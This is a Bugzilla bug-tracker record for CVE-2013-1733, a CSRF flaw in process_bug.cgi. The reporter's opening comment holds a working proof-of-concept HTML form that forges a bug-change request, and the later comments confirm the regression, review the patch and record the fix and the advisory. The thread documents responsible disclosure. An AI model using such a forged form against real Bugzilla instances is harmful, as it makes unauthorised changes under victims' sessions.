Bug 911593 (CVE-2013-1733)

[SECURITY] CSRF in process_bug.cgi

RESOLVED FIXED in Bugzilla 4.4

Status

()

Bugzilla
Creating/Changing Bugs
--
major
RESOLVED FIXED
4 years ago
3 years ago

People

(Reporter: Mateusz Goik, Assigned: Frédéric Buclin)

Tracking

({regression, sec-critical, wsec-csrf})

Bugzilla 4.4
regression, sec-critical, wsec-csrf
Dependency tree / graph
Bug Flags:
approval +
approval4.4 +
blocking4.4.1 +
sec-bounty +

Details

(URL)

Attachments

(1 attachment)

(Reporter)

Description

4 years ago
PoC: (Changes in the bug with ID 21951 - landfill.bugzilla.org)

<html>
  <!-- CSRF PoC - generated by Burp Suite Professional -->
  <body>
    <form action="https://landfill.bugzilla.org/bugzilla-tip/process_bug.cgi" method="POST">
      <input type="hidden" name="delta&#95;ts" value="aaaaaaaaaaaaaaaaaaaaa" />
      <input type="hidden" name="longdesclength" value="1" />
      <input type="hidden" name="id" value="21951" />
      <input type="hidden" name="token" value="aaaaaaaaaaaaaaaaaaaaa" />
      <input type="hidden" name="alias" value="aaaaaaaaa" />
      <input type="hidden" name="short&#95;desc" value="TEST2" />
      <input type="hidden" name="product" value="FoodReplicator" />
      <input type="hidden" name="classification" value="Unclassified" />
      <input type="hidden" name="component" value="renamed&#32;component" />
      <input type="hidden" name="rep&#95;platform" value="PC" />
      <input type="hidden" name="op&#95;sys" value="Linux" />
      <input type="hidden" name="priority" value="P2" />
      <input type="hidden" name="bug&#95;severity" value="normal" />
      <input type="hidden" name="target&#95;milestone" value="&#45;&#45;&#45;" />
      <input type="hidden" name="assigned&#95;to" value="mybutt&#64;inyourface&#46;com" />
      <input type="hidden" name="qa&#95;contact" value="" />
      <input type="hidden" name="bug&#95;file&#95;loc" value="" />
      <input type="hidden" name="status&#95;whiteboard" value="" />
      <input type="hidden" name="keywords" value="" />
      <input type="hidden" name="tag" value="" />
      <input type="hidden" name="dependson" value="" />
      <input type="hidden" name="blocked" value="" />
      <input type="hidden" name="newcc" value="" />
      <input type="hidden" name="defined&#95;bug&#95;ignored" value="1" />
      <input type="hidden" name="see&#95;also" value="" />
      <input type="hidden" name="cf&#95;large&#95;text" value="" />
      <input type="hidden" name="cf&#95;free&#95;text" value="" />
      <input type="hidden" name="defined&#95;cf&#95;mulitple&#95;select" value="" />
      <input type="hidden" name="cf&#95;drop&#95;down" value="&#45;&#45;&#45;" />
      <input type="hidden" name="cf&#95;date" value="" />
      <input type="hidden" name="cf&#95;bug&#95;id" value="" />
      <input type="hidden" name="flag&#95;type&#45;8" value="X" />
      <input type="hidden" name="requestee&#95;type&#45;8" value="" />
      <input type="hidden" name="flag&#95;type&#45;9" value="X" />
      <input type="hidden" name="requestee&#95;type&#45;9" value="" />
      <input type="hidden" name="flag&#95;type&#45;11" value="X" />
      <input type="hidden" name="flag&#95;type&#45;5" value="X" />
      <input type="hidden" name="requestee&#95;type&#45;5" value="" />
      <input type="hidden" name="flag&#95;type&#45;10" value="X" />
      <input type="hidden" name="flag&#95;type&#45;6" value="X" />
      <input type="hidden" name="requestee&#95;type&#45;6" value="" />
      <input type="hidden" name="flag&#95;type&#45;12" value="X" />
      <input type="hidden" name="estimated&#95;time" value="0&#46;0" />
      <input type="hidden" name="work&#95;time" value="0" />
      <input type="hidden" name="remaining&#95;time" value="0&#46;0" />
      <input type="hidden" name="deadline" value="" />
      <input type="hidden" name="comment" value="" />
      <input type="hidden" name="bug&#95;status" value="CONFIRMED" />
      <input type="hidden" name="resolution" value="FIXED" />
      <input type="hidden" name="dup&#95;id" value="" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>
(Assignee)

Comment 1

4 years ago
Confirmed! This is a regression due to bug 69447 which generates a new valid token without first making sure that the midair collision page will be displayed. This bug only affects 4.4 and newer. 4.3.3 and older are not affected.
Assignee: general → create-and-change
Severity: normal → major
Component: Bugzilla-General → Creating/Changing Bugs
Depends on: 69447
Flags: blocking4.4.1+
Keywords: regression
OS: Linux → All
Hardware: x86_64 → All
Summary: CSRF - bugzilla → CSRF in process_bug.cgi
Target Milestone: --- → Bugzilla 4.4
Version: unspecified → 4.4
(Assignee)

Comment 2

4 years ago
I'm on it. Easy to fix.
Assignee: create-and-change → LpSolit
Status: NEW → ASSIGNED
(Assignee)

Comment 3

4 years ago
Created attachment 798337 [details] [diff] [review]
patch, v1

The new token must only be generated when we are going to display the midair collision page. Also, I had to validate delta_ts, else it was possible to crash PostgreSQL if you passed an invalid one.
Attachment #798337 - Flags: review?(dkl)
(Assignee)

Updated

4 years ago
Summary: CSRF in process_bug.cgi → [SECURITY] CSRF in process_bug.cgi
Flags: sec-bounty?
Keywords: sec-critical, wsec-csrf
(Assignee)

Updated

4 years ago
Blocks: 912643
Assigning CVE-2013-1733 to this vulnerability.
Alias: CVE-2013-1733

Updated

4 years ago
Blocks: 912661
Comment on attachment 798337 [details] [diff] [review]
patch, v1

Review of attachment 798337 [details] [diff] [review]:
-----------------------------------------------------------------

Looks fine and fixes the issue for me. r=dkl

::: process_bug.cgi
@@ +114,5 @@
> +my $delta_ts = $cgi->param('delta_ts');
> +
> +if ($delta_ts) {
> +    my $delta_ts_z = datetime_from($delta_ts)
> +      or ThrowCodeError('invalid_timestamp', { timestamp => $delta_ts });

nit: 4 space indentation

@@ +124,3 @@
>  
> +        my $start_at = $cgi->param('longdesclength')
> +          or ThrowCodeError('undefined_field', { field => 'longdesclength' });

same nit
Attachment #798337 - Flags: review?(dkl) → review+
(Assignee)

Comment 6

4 years ago
(In reply to David Lawrence [:dkl] from comment #5)
> nit: 4 space indentation

Not when splitting long lines. ;)
(Assignee)

Updated

4 years ago
Flags: approval?
Flags: approval4.4?

Comment 7

4 years ago
Will be patched on bugzilla.redhat.com at 4am UTC (just over two hours from now)
Flags: approval?
Flags: approval4.4?
Flags: approval4.4+
Flags: approval+
Dave: does this affect BMO? iirc we're on 4.2 plus backported goodies and may or may not suffer from this.
Flags: needinfo?(dkl)
(Assignee)

Comment 9

4 years ago
(In reply to Daniel Veditz [:dveditz] from comment #8)
> Dave: does this affect BMO?

Yes, see bug 912661.
Flags: needinfo?(dkl)
(Assignee)

Comment 10

4 years ago
Committing to: bzr+ssh://lpsolit%40gmail.com@bzr.mozilla.org/bugzilla/trunk/
modified process_bug.cgi
Committed revision 8777.

Committing to: bzr+ssh://lpsolit%40gmail.com@bzr.mozilla.org/bugzilla/4.4/
modified process_bug.cgi
Committed revision 8623.
Status: ASSIGNED → RESOLVED
Last Resolved: 4 years ago
Resolution: --- → FIXED

Updated

4 years ago
Group: bugzilla-security
(Assignee)

Comment 11

4 years ago
Security advisory sent.
Flags: sec-bounty? → sec-bounty+
You need to log in before you can comment on or make changes to this bug.